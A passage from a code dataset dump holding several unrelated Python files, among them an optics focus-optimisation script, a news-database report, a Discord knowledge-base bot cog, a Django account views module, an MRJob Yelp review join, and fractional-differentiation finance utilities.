center2[0] + ab_s[1][0]), (-y_lim_1, y_lim_1))\n limits3 = ((center3[0] - ab_s[2][0], center3[0]), (-y_lim_2, y_lim_2))\n limits4 = ((center4[0], center4[0] + ab_s[3][0]), (-y_lim_2, y_lim_2))\n\n limits = [limits1, limits2, limits3, limits4]\n limits = DELTA_2 + limits # make borders more a little. VERY IMPORTANT\n\n lim_ell = [LimitedSurface(ellipsis[i], limits[i]) for i in range(4)]\n # ___________________________________________________________\n\n # raysPool preparation\n y_abs = 1\n gen_ray_points = [\n [-1.1, -y_abs],\n [-1.1, y_abs]\n ]\n intensity = 5.5\n\n pool = generate_rays_from_line(gen_ray_points[1], intensity)\n # ___________________________________________________________\n # set the needed focus point\n needed_focus_point = np.asarray([9, 0])\n # nelder-mead optimization\n functions = get_functional(needed_focus_point, pool, lim_ell, center_s, logfile=logfile)\n functional = lambda x: functions(x)[0]\n beg_point = np.asarray(ab_s).ravel()\n\n file_name = f\"maxiter{maxiter}.txt\"\n if os.path.exists(file_name):\n print(f\"File '{file_name} exist'. Read data\")\n with open(file_name, mode=\"rb\") as f:\n res = pickle.load(f)\n\n print(\"Data is loaded\")\n else:\n res = minimize(functional, beg_point, method='nelder-mead', options={\"maxiter\": maxiter, 'disp': True},\n tol=2e-10)\n with open(file_name, mode=\"wb\") as f:\n pickle.dump(res, f)\n print(res.x, \"\\n\")\n print(res)\n\n print(\"ell centers \",center_s)\n # ========================================\n dif_bet_focus, pools, sco_f, r1, h, sco, focus_point = functions(res.x)\n points = r1(h)\n\n # ============== PLOTTING ===================\n def draw(limits, points, focus_point):\n global fig_num\n # drawing\n pylab.figure(fig_num, figsize=(6, 5))\n fig_num = fig_num + 1\n # focus point\n xy = [[points[j][i] for j in range(len(points))] for i in range(2)]\n pylab.scatter(xy[0], xy[1], color=\"red\", marker='.', alpha=0.5)\n pylab.scatter(focus_point[0], focus_point[1], color=\"purple\", marker=\"*\")\n\n # surfaces\n for lim_surface in lim_ell:\n msv.draw_exist_surface(lim_surface, \"purple\", 1)\n for ellipse in ellipsis:\n msv.draw_exist_surface(ellipse)\n # rays pools\n for ray_pool in pools:\n mvray.draw_ray_pool(ray_pool, ray_const_length=18, alpha=0.2)\n # config the view\n pylab.grid()\n pylab.xlim(*limits[0])\n pylab.ylim(*limits[1])\n\n # first figure borders\n distanse_from_border = 0.1\n b_max = np.max([ab_s[i][1] for i in range(4)])\n a_max = np.max([ab_s[i][0] for i in range(4)])\n y_inf = np.min([center_s[i][1] for i in range(4)]) - b_max - distanse_from_border\n y_sup = np.max([center_s[i][1] for i in range(4)]) + b_max + distanse_from_border\n x_inf = np.min([center_s[i][0] for i in range(4)]) - a_max - distanse_from_border\n x_sup = np.max([center_s[i][0] for i in range(4)]) + a_max + distanse_from_border\n\n # second figure borders\n is_scale_with_sco = True\n if is_scale_with_sco:\n x_sc, y_sc = 3, 3\n lim_x_sco_min = focus_point[0] - x_sc * sco\n lim_x_sco_max = focus_point[0] + x_sc * sco\n lim_y_sco_min = focus_point[1] - y_sc * sco\n lim_y_sco_max = focus_point[1] + y_sc * sco\n else:\n x_border, y_border = 2, 1\n lim_x_sco_min = focus_point[0] - x_border\n lim_x_sco_max = focus_point[0] + x_border\n lim_y_sco_min = focus_point[1] - y_border\n lim_y_sco_max = focus_point[1] + y_border\n\n draw(((x_inf, x_sup + 6.2), (y_inf, y_sup)), points, focus_point)\n pylab.title(\"Ray density: %.1f, focus at (%.3f,%3.f)\" % (intensity, *focus_point))\n draw(((lim_x_sco_min, lim_x_sco_max), (lim_y_sco_min, lim_y_sco_max)), points, focus_point)\n pylab.title(f\"Count of ray is {len(points)}, sco is {sco}\")\n\n pylab.show()\n\n\nif __name__ == '__main__':\n ab_1_1 = (0.8, 3)\n ab_1_2 = (1, 3)\n center2 = (0, 0)\n center1 = (center2[0] + 0.5, 0)\n y = get_y_lim_ell_intersection([ab_1_1, ab_1_2], [center1, center2])\n print(y)\n\n main()\n","sub_path":"scripts/focus_setting_2_lens.py","file_name":"focus_setting_2_lens.py","file_ext":"py","file_size_in_byte":13552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"537784834","text":"#!/bin/env python2.7\n\nimport psycopg2\n\n\n# Queries and definitions\n\ndef get_popular_articles():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT title,count(title) as total\n FROM articles, authors, log\n WHERE articles.author = authors.id\n AND '/article/'||articles.slug = log.path\n GROUP BY title\n ORDER BY total desc\n LIMIT 3;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n\ndef get_popular_authors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT name, count(*) as total\n FROM articles, authors, log\n WHERE articles.author = authors.id\n AND '/article/'||articles.slug = log.path\n GROUP BY name\n ORDER BY total desc;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n# THIS QUERY REQUIRES THE ERROR_LIST VIEW - Instructions on the read.me\n\n\ndef get_error_rate():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n query = '''\n SELECT day, round(100.0*error/total,2) as percent_rate\n FROM error_list WHERE round(100.0*error/total,2)>1;\n '''\n c.execute(query)\n rows = c.fetchall()\n db.close()\n return rows\n\n# Output queries result to console and parsing\n\n\ndef show_report():\n print(\"Welcome to the report tool, fetching data...\\n\")\n\n data = get_popular_articles()\n print(\"Most popular three articles of all time:\")\n for datum in data:\n print(\"'%s' - %s views \") % (datum)\n print(\"\\n\")\n\n data = get_popular_authors()\n print(\"Most popular articles authors of all time:\")\n for datum in data:\n print(\"'%s' - %s views\") % (datum)\n print(\"\\n\")\n\n data = get_error_rate()\n print(\"Days with more than 1% error rate on request:\")\n for datum in data:\n err_date = datum[0]\n print((err_date.strftime(\"%B %d, %Y\"))+\" - \" +\n str(datum[1])+\"%\"+\" error\")\n\n print(\"\\ndone <3! take care\")\n\nshow_report()\n","sub_path":"report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":1986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"356376607","text":"# Matriz com as duas primeiras linhas já permutadas\nmatriz = [\n\t[ 13, 0, 1, 15 ],\n\t[ 0, 5, -1, 4 ],\n\t[ 1, -1, -1, 0 ]\n]\n\n# Instanciamos as variáveis com os valores iniciais\nvec = [ 1, 1, 1 ]\nstop = False\nk = 0\n\n# Iteramos o sistema enquanto os erros forem maiores de 1E-4\nwhile not stop:\n\tnew_vec = []\n\n\t# Fazemos as iterações para cada variável\n\tfor i in range(len(matriz)):\n\t\tnew_vec.append(matriz[i][-1])\n\t\tfor j in range(len(matriz[i]) - 1):\n\t\t\tif i != j:\n\t\t\t\tnew_vec[-1] -= matriz[i][j] * vec[j]\n\t\tnew_vec[-1] = new_vec[-1] / matriz[i][i]\n\n\t# Avaliamos os erros\n\terrors = []\n\tfor i in range(len(vec)):\n\t\tstop = True\n\t\terrors.append(abs(new_vec[i] - vec[i]))\n\t\tif abs(new_vec[i] - vec[i]) > 1E-4:\n\t\t\tstop = False\n\n\t# Imprimimos as tabelas\n\tvec = new_vec\n\tprint('{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}'.format(k, vec[0], vec[1], vec[2], errors[0], errors[1], errors[2]))\n\tk += 1","sub_path":"EP2/ep_02c.py","file_name":"ep_02c.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"313864646","text":"import aiohttp\nimport logging\nimport time\n\nfrom config import config\nfrom discord.ext import commands\n\n\nasync def http_request(url: str):\n async with aiohttp.ClientSession() as session:\n async with session.get(url) as resp:\n return resp\n\n\nclass WebsiteError(Exception):\n pass\n\n\nclass KnowledgeBaseCog:\n def __init__(self, bot):\n self.bot = bot\n\n @commands.cooldown(1, 1, commands.BucketType.channel)\n @commands.command(name='kb')\n async def lookup(self, ctx, *, arg):\n '''\n Get the library to give us the input as one argument. Prevents\n having to wrap it in quotes or needing to join the words.\n https://discordpy.readthedocs.io/en/rewrite/ext/commands/commands.html?highlight=commands#keyword-only-arguments\n\n Limited to 1 knowledge base query per second per channel.\n '''\n url_root = config.get('knowledge_base', 'kb_wiki_root', fallback=None)\n if url_root is None:\n logging.warning('Knowledge base has no option kb_wiki_root set in config')\n return\n\n phrase = arg.replace(' ', '_') # Turn \"Website is down\" -> \"Website_is_down\"\n msg = await ctx.send('Searching the knowledge base...')\n try:\n logging.debug('Querying {} for \\'{}\\''.format(url_root, phrase))\n response: aiohttp.ClientResponse = await http_request('{}{}'.format(url_root, phrase))\n if response.status == 200:\n # Send the URL to the page\n await msg.edit(content=response.url)\n elif response.status == 404:\n # Try sending a search page with the query\n search_response: aiohttp.Clientresponse = await http_request('{root}index.php?search={query}&profile=default&fulltext=1'\n .format(root=url_root, query=arg.replace(' ', '+')))\n if search_response.status == 200:\n await msg.edit(content='I could not find that exact page, here are some suggestions: {}'.format(search_response.url))\n else:\n raise WebsiteError\n else:\n raise WebsiteError\n except WebsiteError:\n await msg.edit('The knowledge base is not accessible at this time. Try again later.')\n except discord.HTTPException:\n logging.error('Failed to edit knowledge base message with result')\n except Exception as ex:\n await msg.edit('The knowledge base is not accessible at this time. Try again later.')\n logging.error(str(ex))\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(KnowledgeBaseCog(bot))","sub_path":"modules/knowledge_base.py","file_name":"knowledge_base.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"430944522","text":"import os\r\nimport time\r\nimport magic\r\nfrom watchdog.events import FileSystemEventHandler\r\n\r\n\r\nclass MainHandler(FileSystemEventHandler):\r\n def getTypeOfFiles(self):\r\n for filename in os.listdir(originFolder):\r\n currentfile = originFolder + \"/\" + filename\r\n if not os.path.isdir(currentfile):\r\n typeoffile = magic.from_file(currentfile)\r\n switcher = {\r\n \"PDF\": \"pdfs\",\r\n \"JPG\": \"imgs\",\r\n \"PNG\": \"imgs\",\r\n \"TXT\": \"txts\",\r\n \"ZIP\": \"zip\",\r\n \"DOCX\": \"docx\",\r\n \"EXE\": \"exe\",\r\n \"XSLX\": \"xlsx\",\r\n \"PPTX\": \"pptx\",\r\n \"SCI\": \"sci\",\r\n \"ISO\": \"iso\",\r\n \"C\": \"programmingFiles/C\",\r\n }\r\n key = typeoffile.split(\" \")[0].upper()\r\n if key not in switcher:\r\n os.rename(currentfile, destFolder + \"/OTHERS/\" + filename)\r\n else:\r\n folderoftype = switcher[key]\r\n os.rename(currentfile, destFolder + \"/\" + folderoftype + \"/\" + filename)\r\n else:\r\n os.rename(currentfile, destFolder + \"/FOLDERS/\" + filename)\r\n\r\n\r\noriginFolder = \"C:/Users/asico/Downloads\"\r\ndestFolder = \"C:/Users/asico/Desktop/DownloadsRedirected\"\r\n\r\n\r\ntry:\r\n while True:\r\n MainHandler.getTypeOfFiles(MainHandler())\r\n time.sleep(60)\r\nexcept KeyboardInterrupt:\r\n MainHandler.getTypeOfFiles(MainHandler())\r\n","sub_path":"windowsRedirector.py","file_name":"windowsRedirector.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216409034","text":"import pygame\nfrom pygame.locals import *\n\nimport shared\n\nimport threading\nimport queue\n\nclass Pong(threading.Thread):\n def __init__(self, q):\n shared.systemMessage(\"Starting pong\")\n threading.Thread.__init__(self)\n self.q = q\n self.eventConfig = {}\n self.running = True\n\n def run(self):\n try:\n pygame.init()\n FPS = 30\n fpsClock = pygame.time.Clock()\n\n display = pygame.display.set_mode((600, 300), 0, 32)\n pygame.display.set_caption('Pong')\n\n BLACK = (0, 0, 0)\n WHITE = (255, 255, 255)\n\n ball = pygame.image.load('cat-face.png')\n ball = pygame.transform.scale(ball, (30, 30))\n\n ballx = 285\n bally = 135\n\n paddle1 = (10, 115, 15, 70)\n paddle2 = (575, 115, 15, 70)\n\n while self.running:\n opCode = \"\"\n try:\n q_item = self.q.get(False)\n s = q_item\n opCode = s[0:2]\n except Exception: pass\n\n if opCode == \"ex\":\n print(\"Stopping command_interpreter\")\n self.running = False\n self.q.task_done()\n\n display.fill(BLACK)\n\n display.blit(ball, (ballx, bally))\n\n pygame.draw.rect(display, WHITE, paddle1, 0)\n pygame.draw.rect(display, WHITE, paddle2, 0)\n\n for event in pygame.event.get():\n if event.type == QUIT:\n shared.exitProgram()\n\n pygame.display.update()\n fpsClock.tick(FPS)\n\n except Exception as e:\n shared.systemMessage(str(e), True)\n shared.exitProgram()\n\n","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28681394","text":"#!/usr/bin/env python3\nimport click\nimport logging\nimport json\nimport geojson\nimport geopandas as gpd\n\nlogger = logging.getLogger('indexgeojson')\n\n# Probably should use Click like the other scripts? -agl\n@click.command()\n@click.option('--geojson', '-g', default=\"./rumira.geojson\", help=\"geojson file to create extent\")\n@click.option('--output', '-o', default=\"../data/rumira_extent.txt\", help=\"output extent file\")\ndef index(geojson, output):\n print (output)\n\n #with open(geojson) as f:\n #gj = geojson.load(f)\n #features = gj['features'][0]\n #print(features)\n rumira = gpd.read_file(geojson)\n print(rumira.head())\n print(rumira.geometry[0])\n geom = rumira.geometry[0]\n #(minX, maxX, minY, maxY) = geom.GetEnvelope()\n #print(minX, maxX, minY, maxY)\n print(dir(geom))\n print(geom.envelope)\n print(geom.bounds)\n print(geom.exterior)\n extent = [geom.bounds[0], geom.bounds[2], geom.bounds[1], geom.bounds[3]]\n print(extent)\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)\n logger.info(\"Starting the index process\")\n index()\n","sub_path":"labs/ciab/scripts/make_index_from_geojson.py","file_name":"make_index_from_geojson.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"329927358","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login\nfrom django.urls import reverse\nfrom .forms import LoginForm, RegistrationForm, UserProfileForm, UserForm\nfrom .models import UserProfile\n\ndef register(request):\n if request.method == 'POST':\n user_form = RegistrationForm(request.POST)\n userprofile_form = UserProfileForm(request.POST)\n if user_form.is_valid() and userprofile_form.is_valid():\n new_user = user_form.save(commit=False)\n new_user.set_password(user_form.cleaned_data['password'])\n new_user.save()\n new_profile = userprofile_form.save(commit=False)\n new_profile.user = new_user\n new_profile.save()\n return HttpResponseRedirect(reverse('account:user_login'))\n else:\n return HttpResponse(\"Sorry, register error.\")\n else:\n user_form = RegistrationForm()\n userprofile_form = UserProfileForm()\n return render(request, 'account/register.html', {\"form\": user_form, 'profile': userprofile_form})\n\n\n@login_required(login_url='/account/login/')\ndef myself(request):\n # user = User.objects.get(username=request.user.username)\n # userprofile = UserProfile.objects.get(user=user)\n # return render(request, 'account/myself.html', {'user':user, 'userprofile': userprofile})\n user = User.objects.get(username=request.user.username)\n userprofile = UserProfile.objects.get(user=user)\n if request.method == 'GET':\n user_form = UserForm(instance=request.user)\n userprofile_form = UserProfileForm(initial={'birth':userprofile.birth, 'phone':userprofile.phone, 'aboutme':userprofile.aboutme})\n return render(request, 'account/myself.html', {'user_form':user_form,\n 'userprofile_form':userprofile_form, 'userprofile': userprofile})\n if request.method == 'POST':\n new_user_form = UserForm(request.POST)\n new_user_profile_form = UserProfileForm(request.POST)\n if new_user_form.is_valid() and new_user_profile_form.is_valid():\n user_cd = new_user_form.cleaned_data\n user_profile_cd = new_user_profile_form.cleaned_data\n user.email = user_cd['email']\n userprofile.birth = user_profile_cd['birth']\n userprofile.phone = user_profile_cd['phone']\n userprofile.aboutme = user_profile_cd['aboutme']\n user.save()\n userprofile.save()\n return HttpResponseRedirect('/account/myself')\n else:\n return HttpResponse('Data error 1.')\n else:\n return HttpResponse('Unkown error.')\n\n@login_required(login_url='/account/login/')\ndef my_image(request):\n # return render(request, 'account/imagecrop.html',)\n if request.method == 'POST':\n img = request.POST['img']\n userprofile = UserProfile.objects.get(user=request.user.id)\n userprofile.photo = img\n userprofile.save()\n return HttpResponse('1')\n else:\n return render(request, 'account/imagecrop.html',)","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39592247","text":"\"\"\"\nFractional differentiation is a technique to make a time series stationary but also\nretain as much memory as possible. This is done by differencing by a positive real\nnumber. Fractionally differenced series can be used as a feature in machine learning\nprocess.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\n\nclass FractionalDifferentiation:\n \"\"\"\n FractionalDifferentiation class encapsulates the functions that can\n be used to compute fractionally differentiated series.\n \"\"\"\n\n @staticmethod\n def get_weights(diff_amt, size):\n \"\"\"\n Source: Chapter 5, AFML (section 5.4.2, page 79)\n The helper function generates weights that are used to compute fractionally\n differentiated series. It computes the weights that get used in the computation\n of fractionally differentiated series. This generates a non-terminating series\n that approaches zero asymptotically. The side effect of this function is that\n it leads to negative drift \"caused by an expanding window's added weights\"\n (see page 83 AFML)\n\n When diff_amt is real (non-integer) positive number then it preserves memory.\n\n The book does not discuss what should be expected if d is a negative real\n number. Conceptually (from set theory) negative d leads to set of negative\n number of elements. And that translates into a set whose elements can be\n selected more than once or as many times as one chooses (multisets with\n unbounded multiplicity) - see http://faculty.uml.edu/jpropp/msri-up12.pdf.\n\n :param diff_amt: (float) differencing amount\n :param size: (int) length of the series\n :return: (ndarray) weight vector\n \"\"\"\n\n # The algorithm below executes the iterative estimation (section 5.4.2, page 78)\n weights = [1.] # create an empty list and initialize the first element with 1.\n for k in range(1, size):\n weights_ = -weights[-1] * (diff_amt - k + 1) / k # compute the next weight\n weights.append(weights_)\n\n # Now, reverse the list, convert into a numpy column vector\n weights = np.array(weights[::-1]).reshape(-1, 1)\n return weights\n\n @staticmethod\n def frac_diff(series, diff_amt, thresh=0.01):\n \"\"\"\n Source: Chapter 5, AFML (section 5.5, page 82);\n\n References:\n https://www.wiley.com/en-us/Advances+in+Financial+Machine+Learning-p-9781119482086\n https://wwwf.imperial.ac.uk/~ejm/M3S8/Problems/hosking81.pdf\n https://en.wikipedia.org/wiki/Fractional_calculus\n\n The steps are as follows:\n - Compute weights (this is a one-time exercise)\n - Iteratively apply the weights to the price series and generate output points\n\n This is the expanding window variant of the fracDiff algorithm\n Note 1: For thresh-1, nothing is skipped\n Note 2: diff_amt can be any positive fractional, not necessarility bounded [0, 1]\n\n :param series: (pd.Series) a time series that needs to be differenced\n :param diff_amt: (float) Differencing amount\n :param thresh: (float) threshold or epsilon\n :return: (pd.DataFrame) data frame of differenced series\n \"\"\"\n\n # 1. Compute weights for the longest series\n weights = get_weights(diff_amt, series.shape[0])\n\n # 2. Determine initial calculations to be skipped based on weight-loss threshold\n weights_ = np.cumsum(abs(weights))\n weights_ /= weights_[-1]\n skip = weights_[weights_ > thresh].shape[0]\n\n # 3. Apply weights to values\n output_df = {}\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n output_df_ = pd.Series(index=series.index)\n\n for iloc in range(skip, series_f.shape[0]):\n loc = series_f.index[iloc]\n\n # At this point all entries are non-NAs so no need for the following check\n # if np.isfinite(series.loc[loc, name]):\n output_df_[loc] = np.dot(weights[-(iloc + 1):, :].T, series_f.loc[:loc])[0, 0]\n\n output_df[name] = output_df_.copy(deep=True)\n output_df = pd.concat(output_df, axis=1)\n return output_df\n\n @staticmethod\n def get_weights_ffd(diff_amt, thresh, lim):\n \"\"\"\n Source: Chapter 5, AFML (section 5.4.2, page 83)\n\n The helper function generates weights that are used to compute fractionally\n differentiate dseries. It computes the weights that get used in the computation\n of fractionally differentiated series. The series is of fixed width and same\n weights (generated by this function) can be used when creating fractional\n differentiated series.\n This makes the process more efficient. But the side-effect is that the\n fractionally differentiated series is skewed and has excess kurtosis. In\n other words, it is not Gaussian any more.\n\n The discussion of positive and negative d is similar to that in get_weights\n (see the function get_weights)\n\n :param diff_amt: (float) differencing amount\n :param thresh: (float) threshold for minimum weight\n :param lim: (int) maximum length of the weight vector\n :return: (ndarray) weight vector\n \"\"\"\n\n weights = [1.]\n k = 1\n\n # The algorithm below executes the iterativetive estimation (section 5.4.2, page 78)\n # The output weights array is of the indicated length (specified by lim)\n ctr = 0\n while True:\n # compute the next weight\n weights_ = -weights[-1] * (diff_amt - k + 1) / k\n\n if abs(weights_) < thresh:\n break\n\n weights.append(weights_)\n k += 1\n ctr += 1\n if ctr == lim - 1: # if we have reached the size limit, exit the loop\n break\n\n # Now, reverse the list, convert into a numpy column vector\n weights = np.array(weights[::-1]).reshape(-1, 1)\n return weights\n\n @staticmethod\n def frac_diff_ffd(series, diff_amt, thresh=1e-5):\n \"\"\"\n Source: Chapter 5, AFML (section 5.5, page 83);\n\n References:\n https://www.wiley.com/en-us/Advances+in+Financial+Machine+Learning-p-9781119482086\n https://wwwf.imperial.ac.uk/~ejm/M3S8/Problems/hosking81.pdf\n https://en.wikipedia.org/wiki/Fractional_calculus\n\n The steps are as follows:\n - Compute weights (this is a one-time exercise)\n - Iteratively apply the weights to the price series and generate output points\n\n Constant width window (new solution)\n Note 1: thresh determines the cut-off weight for the window\n Note 2: diff_amt can be any positive fractional, not necessarity bounded [0, 1].\n\n :param series: (pd.Series)\n :param diff_amt: (float) differencing amount\n :param thresh: (float) threshold for minimum weight\n :return: (pd.DataFrame) a data frame of differenced series\n \"\"\"\n\n # 1) Compute weights for the longest series\n weights = get_weights_ffd(diff_amt, thresh, series.shape[0])\n width = len(weights) - 1\n\n # 2) Apply weights to values\n # 2.1) Start by creating a dictionary to hold all the fractionally differenced series\n output_df = {}\n\n # 2.2) compute fractionally differenced series for each stock\n for name in series.columns:\n series_f = series[[name]].fillna(method='ffill').dropna()\n temp_df_ = pd.Series(index=series.index)\n for iloc1 in range(width, series_f.shape[0]):\n loc0 = series_f.index[iloc1 - width]\n loc1 = series.index[iloc1]\n\n # At this point all entries are non-NAs, hence no need for the following check\n # if np.isfinite(series.loc[loc1, name]):\n temp_df_[loc1] = np.dot(weights.T, series_f.loc[loc0:loc1])[0, 0]\n\n output_df[name] = temp_df_.copy(deep=True)\n\n # transform the dictionary into a data frame\n output_df = pd.concat(output_df, axis=1)\n return output_df\n\n\ndef get_weights(diff_amt, size):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.get_weights(diff_amt, size)\n\n\ndef frac_diff(series, diff_amt, thresh=0.01):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.frac_diff(series, diff_amt, thresh)\n\n\ndef get_weights_ffd(diff_amt, thresh, lim):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.get_weights_ffd(diff_amt, thresh, lim)\n\n\ndef frac_diff_ffd(series, diff_amt, thresh=1e-5):\n \"\"\" This is a pass-through function \"\"\"\n return FractionalDifferentiation.frac_diff_ffd(series, diff_amt, thresh)\n","sub_path":"mlfinlab/features/fracdiff.py","file_name":"fracdiff.py","file_ext":"py","file_size_in_byte":8825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"211825942","text":"\"\"\"Extraction of content which appears in title case in tokenized text.\n\n\"\"\"\n\nimport re\n\n\n_NO_CAPS = {\n u'a',\n u'an',\n u'and',\n u'at',\n u'but',\n u'by',\n u'for',\n u'from',\n u'nor',\n u'of',\n u'on',\n u'or',\n u'so',\n u'the',\n u'to',\n u'up',\n u'yet',\n}\n\n\n_OPEN = u'('\n\n_CLOSE = u')'\n\n\ndef find_titles(tokenized):\n \"\"\"Just find things that look like titles in the text\"\"\"\n\n # 1) Parse text as normal, looking for title-case words.\n # 2) If a parenthesis is found and not already accepted a partial\n # title, keep parsing.\n # 3) If a paren is found and already parsed a partial title, see if\n # the whole thing looks to be title case. If yes, include it, if no\n # it is terminal.\n # 4) If a close paren is found and we have a title already and the\n # whole paren was not a title, the close paren is terminal.\n\n titles = []\n title = []\n\n i = 0\n\n while i < len(tokenized):\n token = tokenized[i]\n chars, start, end = token\n parsed = None\n\n if chars == _OPEN and len(title) > 0:\n accept_paren, ptitle = _parse_parenthesized(tokenized, i)\n if accept_paren:\n title += ptitle\n i += len(ptitle)\n else:\n parsed, title = _terminate(title)\n i += 1\n\n elif chars == _CLOSE:\n parsed, title = _terminate(title)\n i += 1\n\n else:\n if _should_accept_token(chars, title):\n title.append(token)\n else:\n parsed, title = _terminate(title)\n i += 1\n\n if parsed is not None:\n titles.append(parsed)\n\n # Trailing tokens on last iteration\n parsed, title = _terminate(title)\n if parsed is not None:\n titles.append(parsed)\n\n return titles\n\n\ndef _should_accept_token(token, title):\n return (\n token[0].isupper() or\n re.match(r'\\d+', token) or\n len(title) > 0 and token in _NO_CAPS\n )\n\n\ndef _terminate(title):\n title = _remove_trailing_conjunctions(title)\n parsed = title if len(title) > 0 else None\n return parsed, []\n\n\ndef _remove_trailing_conjunctions(title):\n \"\"\"Avoid accepting eg. 'The Human Rights Act 2000 and'. \"\"\"\n i = start = len(title)\n while i > 0 and title[i-1][0] in _NO_CAPS:\n i -= 1\n\n if i < start:\n return title[:i]\n else:\n return title\n\n\ndef _parse_parenthesized(tokenized, start):\n \"\"\"Examine a parenthesized phrase for inclusion in a title.\n\n Returns (accept, phrase) indicating whether the parsed expression should\n be included in the title.\n\n \"\"\"\n # - Parentheses must be balanced.\n # - All content in parentheses must written in title-case to be included.\n\n brackets_stack = []\n parenthesized = []\n i = start\n all_accepted = True\n\n if not tokenized[start][0] == u'(':\n raise Exception(\n u'No parens starting at {}'.format(start))\n\n while i < len(tokenized):\n token = tokenized[i]\n chars, start, end = token\n\n all_accepted = (\n all_accepted and\n (_should_accept_token(chars, parenthesized) or chars in [_OPEN, _CLOSE])\n )\n\n if chars == u'(':\n parenthesized.append(token)\n brackets_stack.append(chars)\n\n elif chars == u')':\n parenthesized.append(token)\n try:\n brackets_stack.pop()\n except IndexError:\n # Unbalanced\n return False, parenthesized\n else:\n if len(brackets_stack) == 0:\n # End of parens\n return all_accepted, parenthesized\n\n else:\n parenthesized.append(token)\n\n i += 1\n\n balanced = len(brackets_stack) == 0\n final_accepted = all_accepted and balanced\n return final_accepted, parenthesized\n","sub_path":"src/server/lawcrunch/textanalysis/titles.py","file_name":"titles.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178149291","text":"import mrjob\nimport mrjob.compat\nfrom mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\n# import re\nfrom mrjob.protocol import JSONValueProtocol\n\nclass businessReviewJoin(MRJob):\n\n\n INPUT_PROTOCOL = JSONValueProtocol\n SORT_VALUES=True\n \n def mapper(self, _, data):\n if data['type'] == 'review':\n self.increment_counter('status','review.json found',1)\n try:\n yield data['business_id'], ('review', data['text'])\n except ValueError as e:\n pass\n elif data['type'] == 'business':\n self.increment_counter('status','business.json found',1)\n\n try:\n yield data['business_id'], ('categories', data['categories'])\n except ValueError :\n return\n\n\n def reducer(self, key, values):\n cate = None\n for v in values:\n if v[0]=='categories':\n cate = v[1]\n continue\n if not cate:\n self.increment_counter('Warning','No Cate Found',1)\n continue\n self.increment_counter('Status','Cate Found',1)\n yield cate, v[1]\n \n \n def tally_mapper (self, key, values):\n for item in key:\n yield item, len(values)\n def tally_combiner(self, key, values):\n count = 0\n total = 0\n for value in values:\n count += 1\n total += value\n yield key, float(total/count) \n\n def tally_reducer(self, key, values):\n count = 0\n total = 0\n for value in values:\n count += 1\n total += value\n yield key, float(total/count) \n \n \n def steps(self):\n return[\n MRStep(mapper = self.mapper,\n reducer = self.reducer),\n \n MRStep(mapper = self.tally_mapper,\n combiner = self.tally_combiner,\n reducer = self.tally_reducer)]\n \nif __name__ == '__main__':\n businessReviewJoin.run()\n\n\n\n\n","sub_path":"stats/review&tips/joinReviewCtg.py","file_name":"joinReviewCtg.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310937237","text":"#!/usr/bin/env python\n\n#################################################################################################\n# Import libraries\n# These are libraries that you will want to use for this homework\n# cv2 is a libary that is useful for image manipulation\n# os is a libary that does system type things (like creating directories)\n# xml... is a library that lets you parse XML files easily (the annotations are stored in xml files)\n# the last three are necessary to import the edge_boxes library that we'll be using\n#################################################################################################\nimport cv2\t\nimport os\nfrom os import walk\nimport xml.etree.ElementTree as ET\nimport sys\nsys.path.append('/home/min/a/ee570/edge-boxes-with-python/')\t\nimport edge_boxes\nimport time\n\n#################################################################################################\n# User-defined variables\n#################################################################################################\n# This is where the dataset that we'll be working with lives. \n# Since you will be parsing the directory structure, it'd probably be useful to go there and\n# see what it looks like. Type \"nautilus /home/min/a/ee570/hw3-files/hw3-dataset &\" to open a\n# file browser in that directory so you can poke around.\ndatasetDir = '/home/min/a/ee570/hw3-files/hw3-dataset'\n\n# The classes, their ID's, and labels are as follows:\n# \tCLASS NAME\t\tCLASS 